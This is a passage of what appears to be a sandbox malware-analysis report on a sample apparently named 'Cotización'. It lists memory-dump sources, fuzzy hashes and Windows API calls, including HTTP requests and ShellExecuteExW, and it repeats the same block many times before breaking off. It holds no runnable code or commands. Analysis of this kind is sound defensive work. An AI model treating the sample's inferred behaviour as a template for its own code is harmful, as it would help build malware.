                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \$]$h
                • API String ID: 4104443479-3262404753
                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                APIs
                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • CloseHandle.KERNEL32(?), ref: 00457E09
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                • String ID: <$@
                • API String ID: 2417854910-1426351568
                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                • String ID:
                • API String ID: 3705125965-3916222277
                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                APIs
                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$Delete$InfoItem
                • String ID: 0
                • API String ID: 135850232-4108050209
                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                APIs
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                • API String ID: 847901565-1698111956
                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                APIs
                • DestroyWindow.USER32(00000000), ref: 00450A2F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DestroyWindow
                • String ID: msctls_updown32
                • API String ID: 3375834691-2298589950
                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: $<
                • API String ID: 4104443479-428540627
                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: \VH
                • API String ID: 2507767853-234962358
                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: \VH
                • API String ID: 2507767853-234962358
                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                • API String ID: 3850602802-1010561917
                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                • String ID: crts
                • API String ID: 943502515-3724388283
                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$LabelVolume
                • String ID: \VH
                • API String ID: 2006950084-234962358
                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetMenuItemInfoW.USER32 ref: 00449727
                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                • DrawMenuBar.USER32 ref: 00449761
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$InfoItem$Draw_malloc
                • String ID: 0
                • API String ID: 772068139-4108050209
                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
